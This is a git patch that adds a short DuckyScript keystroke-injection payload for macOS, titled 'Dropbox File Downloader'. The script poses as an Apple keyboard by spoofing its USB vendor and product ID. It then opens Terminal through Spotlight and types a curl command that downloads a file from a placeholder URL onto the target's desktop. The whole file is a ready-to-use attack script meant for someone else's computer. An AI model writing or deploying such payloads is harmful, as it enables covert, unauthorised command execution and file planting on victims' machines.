From 883b17fde49b9c648650c86e667ae44390e0c557 Mon Sep 17 00:00:00 2001 From: Narstybits Date: Sat, 3 Jun 2023 00:45:08 -0500 Subject: [PATCH] Name change and update on code --- RECON/Dropbox File Downloader.txt | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 RECON/Dropbox File Downloader.txt diff --git a/RECON/Dropbox File Downloader.txt b/RECON/Dropbox File Downloader.txt new file mode 100644 index 0000000..9862da7 --- /dev/null +++ b/RECON/Dropbox File Downloader.txt @@ -0,0 +1,21 @@ +REM Author: Narsty +REM Title: Dropbox File Downloader +REM Version 1.0 MacOs + +REM Replace with the actual URL for the file you want to download. +REM Additionally, replace filename with the desired name and extension for the downloaded file. +REM the script will download a file to the target MacOs desktop + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING curl -L -o ~/Desktop/ "" +DELAY 500 +ENTER +DELAY 5000 +ENTER \ No newline at end of file